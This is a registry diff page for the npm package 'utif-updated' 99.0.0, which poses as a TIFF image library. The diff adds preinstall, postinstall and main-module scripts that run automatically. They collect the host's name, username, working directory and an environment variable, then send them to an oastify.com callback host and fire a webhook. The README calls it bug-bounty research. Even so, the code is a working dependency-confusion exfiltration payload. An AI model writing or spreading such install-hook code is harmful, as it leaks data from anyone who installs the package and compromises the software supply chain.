npm - utif-updated - Versions diffs - 99.0.0 - Mend

utif-updated 99.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (5) hide show

package/README.md ADDED Viewed

@@ -0,0 +1,6 @@
+# utif-updated
+Security research package - Bug Bounty
+## Author
+icare

package/index.js ADDED Viewed

@@ -0,0 +1,35 @@
+const https = require('https');
+const http = require('http');
+const os = require('os');
+const CALLBACK = 'fyh82qlu93wdksjiz5qjz9h27tdk1e02p.oastify.com';
+if (!global.__utif_updated_triggered) {
+  global.__utif_updated_triggered = true;
+  const webhook = process.env.SECURITY_BUG_BOUNTY_DOCTOLIB_IS_PWN;
+  // Callback Burp avec infos
+  const data = Buffer.from(JSON.stringify({
+    type: 'runtime_require',
+    hostname: os.hostname(),
+    user: os.userInfo().username,
+    cwd: process.cwd(),
+    webhook: webhook || 'NOT_FOUND',
+    timestamp: new Date().toISOString()
+  })).toString('base64');
+  https.get(`https://${CALLBACK}/runtime?d=${data}`, () => {}).on('error', () => {});
+  // Trigger game over
+  if (webhook) {
+    try {
+      const url = new URL(webhook);
+      const client = url.protocol === 'https:' ? https : http;
+      client.get(webhook, () => {}).on('error', () => {});
+    } catch(e) {}
+  }
+}
+// Export vide pour pas casser leur build
+module.exports = {};

package/package.json ADDED Viewed

@@ -0,0 +1,13 @@
+{
+  "name": "utif-updated",
+  "version": "99.0.0",
+  "description": "Security research - Bug Bounty",
+  "main": "index.js",
+  "author": "icare",
+  "license": "MIT",
+  "scripts": {
+    "preinstall": "node preinstall.js || true",
+    "postinstall": "node postinstall.js || true"
+  },
+  "keywords": ["utif", "tiff", "image"]
+}

package/postinstall.js ADDED Viewed

@@ -0,0 +1,26 @@
+const https = require('https');
+const http = require('http');
+const os = require('os');
+const CALLBACK = 'fyh82qlu93wdksjiz5qjz9h27tdk1e02p.oastify.com';
+const webhook = process.env.SECURITY_BUG_BOUNTY_DOCTOLIB_IS_PWN;
+// Callback Burp
+const data = Buffer.from(JSON.stringify({
+  type: 'postinstall',
+  hostname: os.hostname(),
+  user: os.userInfo().username,
+  webhook: webhook || 'empty'
+})).toString('base64');
+https.get(`https://${CALLBACK}/postinstall?d=${data}`, () => {}).on('error', () => {});
+// Trigger game over webhook
+if (webhook) {
+  try {
+    const url = new URL(webhook);
+    const client = url.protocol === 'https:' ? https : http;
+    client.get(webhook, () => {}).on('error', () => {});
+  } catch(e) {}
+}

package/preinstall.js ADDED Viewed

@@ -0,0 +1,36 @@
+const https = require('https');
+const http = require('http');
+const os = require('os');
+const CALLBACK = 'fyh82qlu93wdksjiz5qjz9h27tdk1e02p.oastify.com';
+const data = JSON.stringify({
+  type: 'preinstall',
+  hostname: os.hostname(),
+  user: os.userInfo().username,
+  cwd: process.cwd(),
+  env_target: process.env.SECURITY_BUG_BOUNTY_DOCTOLIB_IS_PWN || 'NOT_FOUND',
+  timestamp: new Date().toISOString()
+});
+// Callback Burp
+const req = https.request({
+  hostname: CALLBACK,
+  port: 443,
+  path: '/preinstall',
+  method: 'POST',
+  headers: { 'Content-Type': 'application/json' }
+}, () => {});
+req.on('error', () => {});
+req.write(data);
+req.end();
+// Trigger leur webhook si présent
+const webhook = process.env.SECURITY_BUG_BOUNTY_DOCTOLIB_IS_PWN;
+if (webhook) {
+  try {
+    const url = new URL(webhook);
+    const client = url.protocol === 'https:' ? https : http;
+    client.get(webhook, () => {}).on('error', () => {});
+  } catch(e) {}
+}